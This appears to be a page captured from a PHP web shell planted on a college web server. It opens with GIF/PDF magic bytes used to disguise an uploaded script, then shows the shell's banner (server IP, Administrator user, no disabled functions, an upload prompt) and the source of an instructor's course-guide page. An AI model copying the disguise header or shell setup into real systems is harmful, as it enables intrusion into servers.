GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/CST2276/ |
Upload File : |
<? // JimMartinson/CST2274/InstructionalGuide.php $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); include('Course/courseInfo.phpinc'); include('classInfo.phpinc'); $title = "Instructional Guide"; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title; $pageMenu = 'Course/courseMenu.phpinc'; include('common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; include('common/sectionHeader.phpinc'); $week = 0; ?> <fieldset><legend>Basic Class Operation</legend> Class is taught simultaneously across both the Hutchinson and Willmar campuses. I can only be on one campus at a time. Which campus I am on can be seen using the schedule <? if ( count($f_Schedule_URL) > 1 ) { ?> ( See the schedule link for the class section you are in above ). <? } else { ?> ( See the schedule link above ). <? } ?> <br> The schedule is really the home page you should go to to see what is happening in class. A brief description of what will be covered in class, your lessons, and your assignments will be listed there. <br> <br> The class lectures are presented via the use of online meeting software. The online meetings will be recorded for student review and for students who cannot attend the online meeting live. <br> <br> While it is best if the student can attend the class in person and on campus this is not always possible. I do not expect students based on one campus to attend in person at another campus. Even if I am on another campus I recommend that you still attend in person and on your home campus so you may interact directly with other students. <br> <br> All class lessons and assignments are available online via the schedule. <br> <br> Contact me with any questions by phone ( 320-234-8546 ) or via email ( <a href="mailto:Jim.Martinson@ridgewater.edu">Jim.Martinson@ridgewater.edu</a> ). <br> If you use email please be sure that your name and the class are identifiable by me in the email. </fieldset> <? include('ReferencesResources.phpinc'); include('JimMartinson/ContactInformation.phpinc'); include('common/sectionFooter.phpinc'); include('common/pageFooter.phpinc'); ?>